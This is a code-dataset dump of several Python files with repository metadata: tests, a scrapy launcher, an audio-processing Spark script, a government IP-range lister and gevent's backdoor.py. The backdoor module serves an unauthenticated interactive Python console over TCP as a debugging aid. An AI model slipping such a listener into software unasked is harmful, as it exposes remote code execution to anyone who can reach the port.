Dataset schema (column, type, observed min / max; ⌀ marks columns that contain nulls):

| Column | Type | Min | Max | Nulls |
|---|---|---|---|---|
| hexsha | string (length) | 40 | 40 | |
| size | int64 | 5 | 2.06M | |
| ext | string (10 classes) | | | |
| lang | string (1 class) | | | |
| max_stars_repo_path | string (length) | 3 | 248 | |
| max_stars_repo_name | string (length) | 5 | 125 | |
| max_stars_repo_head_hexsha | string (length) | 40 | 78 | |
| max_stars_repo_licenses | list (length) | 1 | 10 | |
| max_stars_count | int64 | 1 | 191k | ⌀ |
| max_stars_repo_stars_event_min_datetime | string (length) | 24 | 24 | ⌀ |
| max_stars_repo_stars_event_max_datetime | string (length) | 24 | 24 | ⌀ |
| max_issues_repo_path | string (length) | 3 | 248 | |
| max_issues_repo_name | string (length) | 5 | 125 | |
| max_issues_repo_head_hexsha | string (length) | 40 | 78 | |
| max_issues_repo_licenses | list (length) | 1 | 10 | |
| max_issues_count | int64 | 1 | 67k | ⌀ |
| max_issues_repo_issues_event_min_datetime | string (length) | 24 | 24 | ⌀ |
| max_issues_repo_issues_event_max_datetime | string (length) | 24 | 24 | ⌀ |
| max_forks_repo_path | string (length) | 3 | 248 | |
| max_forks_repo_name | string (length) | 5 | 125 | |
| max_forks_repo_head_hexsha | string (length) | 40 | 78 | |
| max_forks_repo_licenses | list (length) | 1 | 10 | |
| max_forks_count | int64 | 1 | 105k | ⌀ |
| max_forks_repo_forks_event_min_datetime | string (length) | 24 | 24 | ⌀ |
| max_forks_repo_forks_event_max_datetime | string (length) | 24 | 24 | ⌀ |
| content | string (length) | 5 | 2.06M | |
| avg_line_length | float64 | 1 | 1.02M | |
| max_line_length | int64 | 3 | 1.03M | |
| alphanum_fraction | float64 | 0 | 1 | |
| count_classes | int64 | 0 | 1.6M | |
| score_classes | float64 | 0 | 1 | |
| count_generators | int64 | 0 | 651k | |
| score_generators | float64 | 0 | 1 | |
| count_decorators | int64 | 0 | 990k | |
| score_decorators | float64 | 0 | 1 | |
| count_async_functions | int64 | 0 | 235k | |
| score_async_functions | float64 | 0 | 1 | |
| count_documentation | int64 | 0 | 1.04M | |
| score_documentation | float64 | 0 | 1 | |

Each record below lists these metadata fields, followed by the file `content` and the per-file statistics columns.
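The records that follow are easier to consume programmatically than to read raw. As a minimal sketch (assuming the rows have been exported to a JSON-lines file named `samples.jsonl`, which is an assumption and not part of this dump), the columns above can be loaded and filtered with pandas:

```python
import pandas as pd

# Hypothetical export of the records below, one JSON object per line.
SAMPLES_PATH = "samples.jsonl"

df = pd.read_json(SAMPLES_PATH, lines=True)

# Keep a readable subset of the schema above.
subset = df[[
    "hexsha",
    "max_stars_repo_name",
    "max_stars_repo_path",
    "max_stars_repo_licenses",
    "max_stars_count",
    "content",
    "score_documentation",
]]

# Example filter: files with a documentation score above 0.5 (scores lie in [0, 1]).
well_documented = subset[subset["score_documentation"] > 0.5]
print(well_documented.head())
```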
9ed4c95b11ddd761bdc51c8d9a831201ff7973eb | 1,080 | py | Python | pandas_support/test_pandas_support.py | quanbingDG/sharper | 4cd5c6b3238d5e430d5986829cc4e0bb47ab3dff | [
"MIT"
]
| null | null | null | pandas_support/test_pandas_support.py | quanbingDG/sharper | 4cd5c6b3238d5e430d5986829cc4e0bb47ab3dff | [
"MIT"
]
| 2 | 2021-01-13T03:39:15.000Z | 2021-01-19T08:50:18.000Z | pandas_support/test_pandas_support.py | quanbingDG/sharper | 4cd5c6b3238d5e430d5986829cc4e0bb47ab3dff | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
# @Time : 2020/11/9 9:13 PM
# @Author : quanbing
# @Email : [email protected]
import pandas as pd
import numpy as np
from unittest import TestCase
from pandas_support import PandasSupport as PS
# @File : test_pandas_support.py
class TestPandasSupport(TestCase):
    def setUp(self) -> None:
        self._test_frame = pd.DataFrame(np.array([1, 2, 3, 4]).reshape(2, 2), columns=['i1', 'i2'])

    def test_check_cols(self):
        self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1']), True)
        self.assertEqual(PS.check_cols(['col1', 'col2'], ['col']), False)
        self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1', 'col3']), False)
        self.assertEqual(PS.check_cols(['col1', 'col2'], 'col1'), True)

    def test_add_ratio(self):
        self.assertEqual(PS.add_ratio(self._test_frame, ['i1']).columns.__len__(), 3)
        self.assertEqual(PS.add_ratio(self._test_frame, ['i1'], csum=True).columns.__len__(), 4)

    def test_add_csum(self):
        self.assertEqual(PS.add_csum(self._test_frame, 'i1').columns.__len__(), 3)
| 38.571429 | 99 | 0.655556 | 825 | 0.76107 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.214022 |
9ed4d88c4f6045e4df06f3ac9733b88b158d09a9 | 245 | py | Python | 08-About_scrapy/douban/main.py | jiaxiaochu/spider | 4b0f751f76a31556a91dea719873cf2979e4be94 | [
"MIT"
]
| null | null | null | 08-About_scrapy/douban/main.py | jiaxiaochu/spider | 4b0f751f76a31556a91dea719873cf2979e4be94 | [
"MIT"
]
| 1 | 2020-08-27T10:25:38.000Z | 2020-08-27T10:25:38.000Z | 08-About_scrapy/douban/main.py | jiaxiaochu/spider | 4b0f751f76a31556a91dea719873cf2979e4be94 | [
"MIT"
]
| null | null | null | # !/Library/Frameworks/Python.framework/Versions/3.7/bin/python3
# -*- coding:utf-8 -*-
# @Author : Jiazhixiang
# Import the cmdline module, which can be used to control the terminal command line.
from scrapy import cmdline
# Use the execute() method to pass in the command that runs scrapy.
cmdline.execute(['scrapy', 'crawl', 'douban'])
| 24.5 | 64 | 0.726531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 247 | 0.809836 |
9ed556610d4e386e3f7c1552b11e15722ee31053 | 1,125 | py | Python | DynamicProgramming/longestIncreasingSubsequence.py | suyash248/data_structures | 41a732cebf791ed63edbce10329251f03b763ccf | [
"Apache-2.0"
]
| 7 | 2017-12-13T05:54:29.000Z | 2022-03-25T09:10:59.000Z | DynamicProgramming/longestIncreasingSubsequence.py | suyash248/data_structures | 41a732cebf791ed63edbce10329251f03b763ccf | [
"Apache-2.0"
]
| null | null | null | DynamicProgramming/longestIncreasingSubsequence.py | suyash248/data_structures | 41a732cebf791ed63edbce10329251f03b763ccf | [
"Apache-2.0"
]
| 4 | 2019-05-22T02:51:56.000Z | 2021-05-23T10:49:57.000Z | from Array import empty_1d_array
"""
input array : [10, 22, 9, 33, 21, 50, 41, 60]
# Element at each index `i` is representing length of longest LIS from index 0 to i in input array.
output array: [1, 2, 1, 3, 2, 4, 4, 5]
"""
# Time complexity: O(n^2)
# Space complexity: O(n)
def lis_dp(arr):
    # Length of LIS at each index is at least 1 (element itself).
    n = len(arr)
    lis_arr = empty_1d_array(n, 1)
    for i in xrange(1, n):  # for i=1; i<n; i++
        for j in xrange(0, i):  # for j=0; j<i; j++
            if arr[i] > arr[j]:  # and lis_arr[i] < lis_arr[j]+1:
                prev_lis_till_i = lis_arr[i]
                curr_lis_till_i = lis_arr[j] + 1
                if curr_lis_till_i > prev_lis_till_i:
                    # Update lis_till_i
                    lis_arr[i] = curr_lis_till_i
    # print lis_arr
    return max(lis_arr)


if __name__ == '__main__':
    arr = [10, 22, 9, 33, 21, 50, 41, 60]
    max_lis = lis_dp(arr)
    print "Length of longest increasing sub-sequence for given array is {}".format(max_lis) | 36.290323 | 99 | 0.543111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 494 | 0.439111 |
9ed6cf9a0648712f69e8e03077835798f4836842 | 4,318 | py | Python | venv/Lib/site-packages/gevent/backdoor.py | Kiiwi/Syssel | 83705e3fd0edf40f09df950d5ce91c95586573f5 | [
"BSD-3-Clause"
]
| null | null | null | venv/Lib/site-packages/gevent/backdoor.py | Kiiwi/Syssel | 83705e3fd0edf40f09df950d5ce91c95586573f5 | [
"BSD-3-Clause"
]
| null | null | null | venv/Lib/site-packages/gevent/backdoor.py | Kiiwi/Syssel | 83705e3fd0edf40f09df950d5ce91c95586573f5 | [
"BSD-3-Clause"
]
| null | null | null | # Copyright (c) 2009-2014, gevent contributors
# Based on eventlet.backdoor Copyright (c) 2005-2006, Bob Ippolito
from __future__ import print_function
import sys
from code import InteractiveConsole
from gevent import socket
from gevent.greenlet import Greenlet
from gevent.hub import PY3, PYPY, getcurrent
from gevent.server import StreamServer
if PYPY:
import gc
__all__ = ['BackdoorServer']
try:
sys.ps1
except AttributeError:
sys.ps1 = '>>> '
try:
sys.ps2
except AttributeError:
sys.ps2 = '... '
class _Greenlet_stdreplace(Greenlet):
_fileobj = None
def switch(self, *args, **kw):
if self._fileobj is not None:
self.switch_in()
Greenlet.switch(self, *args, **kw)
def switch_in(self):
self.saved = sys.stdin, sys.stderr, sys.stdout
sys.stdin = sys.stdout = sys.stderr = self._fileobj
def switch_out(self):
sys.stdin, sys.stderr, sys.stdout = self.saved
self.saved = None
def run(self):
try:
return Greenlet.run(self)
finally:
# XXX why is this necessary?
self.switch_out()
class BackdoorServer(StreamServer):
"""Provide a backdoor to a program for debugging purposes.
You may bind to any interface, but for security purposes it is recommended
that you bind to 127.0.0.1.
Basic usage:
>> from gevent.backdoor import BackdoorServer
>> server = BackdoorServer(('127.0.0.1', 5001),
... locals={'foo': "From defined scope!"})
>> server.serve_forever()
In another terminal, connect with...
$ telnet 127.0.0.1 5001
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Python 2.7.5 (default, May 12 2013, 12:00:47)
[GCC 4.8.0 20130502 (prerelease)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
(InteractiveConsole)
>> print foo
From defined scope!
"""
def __init__(self, listener, locals=None, banner=None, **server_args):
StreamServer.__init__(self, listener, spawn=_Greenlet_stdreplace.spawn, **server_args)
self.locals = locals
self.banner = banner
self.stderr = sys.stderr
def handle(self, conn, address):
f = getcurrent()._fileobj = _fileobject(conn)
f.stderr = self.stderr
getcurrent().switch_in()
try:
console = InteractiveConsole(self.locals)
# __builtins__ may either be the __builtin__ module or
# __builtin__.__dict__ in the latter case typing
# locals() at the backdoor prompt spews out lots of
# useless stuff
try:
import __builtin__
console.locals["__builtins__"] = __builtin__
except ImportError:
import builtins
console.locals["builtins"] = builtins
console.locals['__builtins__'] = builtins
console.interact(banner=self.banner)
except SystemExit: # raised by quit()
if not PY3:
sys.exc_clear()
finally:
conn.close()
f.close()
if PYPY:
# The underlying socket somewhere has a reference
# that's not getting closed until finalizers run.
# Without running them, test__backdoor.Test.test_sys_exit
# hangs forever
gc.collect()
class _fileobject(socket._fileobject):
if not PY3:
def write(self, data):
self._sock.sendall(data)
else:
def write(self, data):
if isinstance(data, str):
data = data.encode('utf-8')
self._sock.sendall(data)
def isatty(self):
return True
def flush(self):
pass
def _readline(self, *a):
return socket._fileobject.readline(self, *a).replace(b"\r\n", b"\n")
if not PY3:
readline = _readline
else:
def readline(self, *a):
line = self._readline(*a)
return line.decode('utf-8')
if __name__ == '__main__':
if not sys.argv[1:]:
print('USAGE: %s PORT' % sys.argv[0])
else:
BackdoorServer(('127.0.0.1', int(sys.argv[1])), locals={'hello': 'world'}).serve_forever()
| 29.175676 | 98 | 0.598194 | 3,576 | 0.828161 | 0 | 0 | 0 | 0 | 0 | 0 | 1,433 | 0.331867 |
9ed839d6a98ae914dcbccc4b145b5eaa923e4f41 | 7,385 | py | Python | spark/par_decompress_audio.py | droyston/spectralize | 572770e7358acc3ec433470659759c17453409f2 | [
"MIT"
]
| null | null | null | spark/par_decompress_audio.py | droyston/spectralize | 572770e7358acc3ec433470659759c17453409f2 | [
"MIT"
]
| null | null | null | spark/par_decompress_audio.py | droyston/spectralize | 572770e7358acc3ec433470659759c17453409f2 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 17 16:12:56 2020
@author: dylanroyston
"""
# import/configure packages
import numpy as np
import pandas as pd
#import pyarrow as pa
import librosa
import librosa.display
from pathlib import Path
#import Ipython.display as ipd
#import matplotlib.pyplot as plt
from pyspark.sql import *
import pyspark.sql.functions as f
from pyspark import SparkConf, SparkContext, SQLContext
import boto3
from tinytag import TinyTag as tt
import soundfile as sf
import audioread
from pydub import AudioSegment
from io import BytesIO
#from io import BytesIO
import os
import sys
import time
import struct
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/lib")
#import config
time_seq = []
#####
# create local Spark instance (for non-cluster dev)
sc = SparkContext('local')
spark = SparkSession (sc)
spark.conf.set("spark.sql.execution.arrow.enabled", "true")
# define Spark config
def spark_conf():
conf = SparkConf().setAppName("decompress_audio_files")
sc = SparkContext(conf=conf)
spark = SparkSession.builder.getOrCreate()
return spark
spark = spark_conf()
spark.conf.set("spark.sql.execution.arrow.enabled", "true")
#####
# Function to write spark-dataframe to mySQL
def write_df_to_psql(df, tablename):
psql_user = os.environ.get('PSQL_USR')
psql_pwd = os.environ.get('PSQL_PWD')
df.write.format('jdbc').options(
url='jdbc:postgresql://10.0.0.6:5432/spectralize',
dbtable=tablename,
user=psql_user,
#password=psql_pwd).mode('append').save()
password=psql_pwd).save()
#####
# function to read audio files from S3 bucket and extract tags
def read_audio_files():
# basic initialization
time_seq.append(['start-read-audio', time.time()])
# DataFrame schema
File_Tags = Row("s3_key", "song_id", "album", "albumartist", "artist",
"audio_offset", "bitrate", "channels", "comment", "composer",
"disc", "disc_total", "duration", "filesize", "genre",
"samplerate", "title", "track", "track_total", "year")
spec_labels = []
for sn in range(0,128):
spec_labels.append('spec' + str(sn+1))
spec_df_labels = ['song_id','timeseries'] + spec_labels
Spec_Tags = Row(spec_df_labels)
# configure S3 access
s3_bucket = 'mdp-spectralize-pal'
number_of_files = 0
s3 = boto3.resource('s3')
boto_client = boto3.client('s3')
bucket = s3.Bucket(s3_bucket)
number_of_files=0
file_limit=100
#local_path = './local_file.'
known_ext = [".mp3", ".wav", ".m4a"]
#read each file from S3 bucket
for obj in bucket.objects.all():
s3_key = obj.key
audio_obj_stream = boto_client.get_object(Bucket=s3_bucket, Key=s3_key)
audio_obj = BytesIO(audio_obj_stream['Body'].read())
# Alternative ways of decoding the downloaded object, left disabled
# (none of these results are used below):
#song = bytes(audio_obj)
#song = sf.SoundFile(audio_obj)
#song = open(audio_obj, 'rb').read()
#song = audioread.audio_open(audio_obj)
# extract tags from mp3 files
#if "mp3" in s3_key:
#if any(ext in s3_key for ext in known_ext):
#print(number_of_files)
#ext = s3_key[-4:]
#local_path = './localfile' + ext
number_of_files+=1
#bucket.download_file(s3_key, local_path)
local_path = '/home/dylanroyston/Music/spectralize_data/01 Konoha Densetsu.mp3'
#song = open(local_path, 'rb').read()
##### tags
# TinyTag expects a file path, so read the tags from the local file
tags = tt.get(local_path)
#tags = tt.get(audio_obj)
# extract tags from tinytag object
indiv_tags = (s3_key, number_of_files, tags.album, tags.albumartist, tags.artist,
tags.audio_offset, tags.bitrate, tags.channels,
tags.comment, tags.composer, tags.disc,
tags.disc_total, tags.duration, tags.filesize,
tags.genre, tags.samplerate, tags.title, tags.track,
tags.track_total, tags.year)
# convert tuple object to list
indiv_tag_list = list(indiv_tags)
indiv_tag_list = [str(i) for i in indiv_tag_list]
tag_seq=[]
tag_seq.append(indiv_tag_list)
tags_pdf = pd.DataFrame(data=tag_seq)
tag_df = spark.createDataFrame(tags_pdf, schema=File_Tags)
##### audio
# load audio file with Librosa
#y, sr = librosa.load(str(Path(local_path)), sr=None)
y, sr = librosa.load(local_path, sr=None)
# create indexing variables (song_id, timestamp)
# song_id defined as "repeat(number_of_files)"
song_num = pd.Series([number_of_files])
num_points = len(y)
song_id = song_num.repeat(num_points)
song_id = song_id.to_numpy()
# timeseries defined as "1 : length(audio_data)"
timeseries = np.arange(num_points)
timeseries = timeseries.transpose()
full_audio = {'song_id': song_id, 'timeseries': timeseries,
'intensity': y}
# create combined dataframe
audio_pdf = pd.DataFrame(data = full_audio)
audio_df = spark.createDataFrame(audio_pdf)
##### spectral
S = librosa.feature.melspectrogram(y, sr=sr, n_mels=128, fmax=10000)
log_S = librosa.power_to_db(S, ref=np.max)
log_S = log_S.transpose()
# song_id defined as "repeat(number_of_files)"
song_num = pd.Series([number_of_files])
num_points = len(S.transpose())
song_id = song_num.repeat(num_points)
song_id = song_id.to_numpy()
# timeseries defined as "1 : length(audio_data)"
timeseries = np.arange(num_points)
timeseries = timeseries.transpose()
full_index = {'song_id': song_id, 'timeseries': timeseries}
index_pdf = pd.DataFrame(full_index)
spec_pdf = pd.DataFrame(data=log_S, columns=spec_labels)
full_spec = pd.concat([index_pdf, spec_pdf], axis=1)
spec_df = spark.createDataFrame(full_spec)
##### write dataframes to psql
write_df_to_psql(tag_df, 'clean_metadata')
write_df_to_psql(audio_df, 'clean_audio')
write_df_to_psql(spec_df, 'clean_spec')
# stop process when file_limit is crossed (small batches)
if (number_of_files >= file_limit):
break
#####
time_seq.append(['end read-file', time.time()])
#df_tags = spark.createDataFrame(tag_seq, schema=File_Tags)
#df_audio = spark.createDataFrame(audio_seq)
#df_spec = spark.createDataFrame(audio_seq, schema=Spec_Tags)
# Additional run to
#df_audio_data = spark.createDataFrame(file_audio_data)
#process_df(df_audio_data)
#####
if __name__ == '__main__':
time_seq.append(['start', time.time()])
read_audio_files()
| 27.867925 | 90 | 0.59499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,314 | 0.313338 |
9eda27b08876015d63b9cfdc12be859142fbbd21 | 1,073 | py | Python | get_ip_list_ru_gov.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
]
| 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | get_ip_list_ru_gov.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
]
| 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | get_ip_list_ru_gov.py | gil9red/SimplePyScripts | c191ce08fbdeb29377639184579e392057945154 | [
"CC-BY-4.0"
]
| 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
"""
The script prints a list of IP addresses of government organizations.
"""
import ipaddress
import sys
import requests
rs = requests.get('https://jarib.github.io/anon-history/RuGovEdits/ru/latest/ranges.json')
# Check that the request succeeded and that the expected data was received
if not rs or not rs.json() or 'ranges' not in rs.json():
    print('Failed to get the list of IP addresses of government organizations')
    sys.exit()

# Get the items and sort them by organization name
items = sorted(rs.json()['ranges'].items(), key=lambda x: x[0])

ip_counter = 0

for i, (name, ip_network_list) in enumerate(items, 1):
    print(f'{i}. {name}')

    # IP ranges with their subnet masks
    for ip_network in ip_network_list:
        print(f' {ip_network}:')

        # Get the IP subnet
        net4 = ipaddress.ip_network(ip_network)

        # Iterate over the IP addresses of the given organization
        for ip in net4.hosts():
            print(f' {ip}')
            ip_counter += 1

    print()

print('Total IPs:', ip_counter)
| 22.354167 | 90 | 0.665424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 791 | 0.591181 |
9edc1088501805cae0cb1dc1f360911a6998aed9 | 1,337 | py | Python | test_collection.py | Rodrun/weatherguess | 468ae8f6484ee3e3e82262ae10d845fd2d9b4267 | [
"MIT"
]
| null | null | null | test_collection.py | Rodrun/weatherguess | 468ae8f6484ee3e3e82262ae10d845fd2d9b4267 | [
"MIT"
]
| null | null | null | test_collection.py | Rodrun/weatherguess | 468ae8f6484ee3e3e82262ae10d845fd2d9b4267 | [
"MIT"
]
| null | null | null | import unittest
import requests
from collection import Collection
class TestCollection(unittest.TestCase):
    def setUp(self):
        # Get the sample JSON data
        self.data = requests.get("http://samples.openweathermap.org/data/2.5/weather?zip=94040,us&appid=b6907d289e10d714a6e88b30761fae22").json()
        self.coll = Collection(getlist=["weather.main", "main.temp", "clouds.all", "doesntExist"])
        self.dcoll = Collection()

    def test_detect_none(self):
        """
        Test if get_weather returns a list of the default value when given None.
        """
        self.assertCountEqual([x for x in self.coll.get_weather(None)],
                              [0. for i in range(0, len(self.coll.get_getlist()))])

    def test_get_weather(self):
        """
        Test if get_weather functions correctly.
        """
        data = [x for x in self.coll.get_weather(self.data)]
        self.assertIsInstance(data[0], str)
        self.assertIsInstance(data[1], float)
        self.assertIsInstance(data[2], int)
        self.assertEqual(data[3], 0.)

    def test_get_weather_defaults(self):
        """
        Test if get_weather functions correctly using the default getlist.
        """
        data = [x for x in self.dcoll.get_weather(self.data)]
        self.assertIsNotNone(data)
        print(data)
| 34.282051 | 145 | 0.635004 | 1,268 | 0.948392 | 0 | 0 | 0 | 0 | 0 | 0 | 430 | 0.321616 |
9edc4b896c4673af8ba61e91bf9ac87a555fe75f | 272 | py | Python | tests/bitwiseOperations/__init__.py | mgorzkowski/abn | 3a9ac6fb0cfe9d497b6d8f26373d2af3b6ff9860 | [
"MIT"
]
| 4 | 2018-04-24T15:25:55.000Z | 2022-03-08T15:01:07.000Z | tests/bitwiseOperations/__init__.py | mgorzkowski/abn | 3a9ac6fb0cfe9d497b6d8f26373d2af3b6ff9860 | [
"MIT"
]
| 2 | 2021-05-04T19:44:28.000Z | 2021-05-05T11:51:15.000Z | tests/bitwiseOperations/__init__.py | mgorzkowski/abn | 3a9ac6fb0cfe9d497b6d8f26373d2af3b6ff9860 | [
"MIT"
]
| null | null | null | from . import nand_tests
from . import and_tests
from . import nor_tests
from . import not_tests
from . import or_tests
from . import xor_tests
from . import rotate_left_tests
from . import rotate_right_tests
from . import shift_left_tests
from . import shift_right_tests
| 24.727273 | 32 | 0.816176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
9edd07604a3a97e4febf7283f02a7a1e61075cbb | 36,220 | py | Python | exot/util/misc.py | ETHZ-TEC/exot_eengine | 7b7ce6cb949e1b0a02e716b03f2f9af751713b29 | [
"BSD-3-Clause"
]
| null | null | null | exot/util/misc.py | ETHZ-TEC/exot_eengine | 7b7ce6cb949e1b0a02e716b03f2f9af751713b29 | [
"BSD-3-Clause"
]
| null | null | null | exot/util/misc.py | ETHZ-TEC/exot_eengine | 7b7ce6cb949e1b0a02e716b03f2f9af751713b29 | [
"BSD-3-Clause"
]
| null | null | null | # Copyright (c) 2015-2020, Swiss Federal Institute of Technology (ETH Zurich)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""Misc helpers"""
import math
import random
import re
import signal
import typing as t
from datetime import datetime
from enum import Enum
from functools import reduce
from inspect import isabstract
from string import ascii_letters
from subprocess import list2cmdline as _list2cmdline
from typing import Mapping as Map
import numpy as np
from exot.exceptions import *
__all__ = (
"call_with_leaves",
"dict_depth",
"dict_diff",
"find_attributes",
"flatten_dict",
"get_concrete_subclasses",
"get_subclasses",
"get_valid_access_paths",
"getitem",
"has_method",
"has_property",
"has_type",
"has_variable",
"is_abstract",
"is_scalar_numeric",
"leaves",
"list2cmdline",
"map_to_leaves",
"mro_getattr",
"mro_hasattr",
"random_string",
"safe_eval",
"sanitise_ansi",
"setgetattr",
"setitem",
"stub_recursively",
"unpack__all__",
"validate_helper",
"get_cores_and_schedules",
)
"""
Signatures
----------
call_with_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> None
dict_depth :: (obj: Any, level: int = 0) -> int
dict_diff :: (left: Mapping, right: Mapping) -> List[Dict]
find_attributes :: (attr: str, klass: Any) -> List
flatten_dict :: (obj: Mapping, sep: str = '.') -> Mapping
get_concrete_subclasses :: (klass, recursive=True, derived=True) -> List
get_subclasses :: (klass, recursive=True, derived=True) -> List
get_valid_access_paths :: (obj: Mapping, _limit: int = 8192, _leaf_only: bool = False, _use_lists: bool = True, _fallthrough_empty: bool = True) -> Generator
getitem :: (obj: Mapping, query: Union[str, Tuple], *args: Any, sep: str = '/') -> Any
has_method :: (klass: Union[type, object], name: str) -> bool
has_property :: (klass: Union[type, object], name: str) -> bool
has_type :: (klass: Union[type, object]) -> bool
has_variable :: (klass: Union[type, object], name: str) -> bool
is_abstract :: (klass: Union[type, object]) -> bool
is_scalar_numeric :: (value: t.Any) -> bool
map_to_leaves :: (function: Callable[[Any], Any], obj: ~T, _seq: bool = True) -> Any
mro_getattr :: (cls: type, attr: str, *args: Any) -> Any
mro_hasattr :: (cls: type, attr: str) -> bool
random_string :: (length: int) -> str
safe_eval :: (to_eval: str, expect: Tuple[type], timeout: int) -> object
sanitise_ansi :: (value Union[List[str], str]) -> Union[List[str], str]
setgetattr :: (klass: Union[type, object], attr: str, default: Any) -> None
setitem :: (obj: MutableMapping, query: Tuple, value: Any) -> None
stub_recursively :: (obj: ~T, stub: Any = None, _stub_list_elements: bool = True) -> Optional[~T]
unpack__all__ :: (*imports: Collection[str]) -> Tuple[str]
validate_helper :: (what: Mapping, key: Any, *types: type, msg: str = '') -> NoReturn
"""
def call_with_leaves(function: t.Callable[[t.Any], t.Any], obj: t.T, _seq: bool = True) -> None:
"""Calls a function on leaves of an object
A leaf is considered to be an object that is not a Mapping (or, when _seq is set,
also not a Sequence except a string, which is also a Sequence).
Args:
function (t.Callable[[t.Any], t.Any]): The callable
obj (t.T): The tree-like or sequence-like object
_seq (bool, optional): Should sequences be considered?. Defaults to True.
"""
def inner(obj: t.T) -> t.Any:
if isinstance(obj, Map):
for v in obj.values():
inner(v)
elif _seq and isinstance(obj, (t.List, t.Set)):
for v in obj:
inner(v)
else:
return function(obj)
inner(obj)
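# A minimal usage sketch of call_with_leaves, assuming a small hypothetical
# mapping; the helper below is illustrative only and is not exported in __all__.
def _example_call_with_leaves() -> t.List[t.Any]:
    collected: t.List[t.Any] = []
    call_with_leaves(collected.append, {"a": 1, "b": {"c": [2, 3]}, "d": {4, 5}})
    # 'collected' now holds the leaf values, e.g. [1, 2, 3, 4, 5] (set order may vary).
    return collected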
def dict_depth(obj: t.Any, level: int = 0) -> int:
"""Get maximum depth of a dict-like object
Args:
obj (t.Any): The dict-like object
level (int): For internal use only. Defaults to 0.
.. note::
The depth of a non-dict-like object is considered to be 0.
An empty dict increases the depth if `_empty_increments` is True.
Examples:
>>> dict_depth(1) # returns 0
>>> dict_depth([1,2,3]) # returns 0
>>> dict_depth({1: 1, 2: 2}) # returns 1
>>> dict_depth({1: {2: {3: 3}}}) # returns 3
>>> dict_depth({1: {2: {3: {}}}}) # returns 4
"""
if not isinstance(obj, Map) or not obj:
return level
return max(dict_depth(v, level + 1) for k, v in obj.items())
def dict_diff(left: Map, right: Map) -> t.List[t.Dict]:
"""Get the difference between 2 dict-like objects
Args:
left (Map): The left dict-like object
right (Map): The right dict-like object
The value returned is a list of dictionaries with keys ["path", "left", "right"]
which contain the query path and the differences between the left and right mapping.
If a key is missing in either mapping, it will be indicated as a "None".
`math.nan` (not-a-number) is used for default values in the comparison because of
the property: `math.nan != math.nan`. Simple None cannot be used, since it would
not handle keys that both have a value of None. In general, this function might
report false-positives for keys that contain the math.nan (or np.nan) value simply
due to this property. There is no workaround available.
"""
left_paths = set(get_valid_access_paths(left, _leaf_only=True, _use_lists=False))
right_paths = set(get_valid_access_paths(right, _leaf_only=True, _use_lists=False))
return list(
{
"path": path,
"left": getitem(left, path, math.nan),
"right": getitem(right, path, math.nan),
}
for path in left_paths.union(right_paths)
if getitem(left, path, math.nan) != getitem(right, path, math.nan)
)
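# A minimal usage sketch of dict_diff with hypothetical data; keys missing on
# one side surface as math.nan on that side. Illustrative only, not exported
# in __all__.
def _example_dict_diff() -> t.List[t.Dict]:
    left = {"a": 1, "b": {"c": 2}}
    right = {"a": 1, "b": {"c": 3}, "d": 4}
    # Expected entries (order not guaranteed):
    #   {"path": ("b", "c"), "left": 2, "right": 3}
    #   {"path": ("d",), "left": nan, "right": 4}
    return dict_diff(left, right)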
def find_attributes(klass: t.Any, attr: str) -> t.List:
"""Find attributes in any of a class'es bases
Args:
klass (t.Any): The type object
attr (str): The attribute
Returns:
t.List: List of found instances of the attribute in the class hierarchy
"""
if not isinstance(attr, str):
raise TypeError(attr)
mro = klass.__mro__ if hasattr(klass, "__mro__") else type(klass).mro()
return [attr for base in mro if hasattr(base, attr)]
def flatten_dict(obj: Map, sep: str = ".") -> Map:
"""Flatten a dict to a 1-level dict combining keys with a separator
Args:
obj (Map): The dict-like object
sep (str): The separator used when combining keys. Defaults to ".".
Returns:
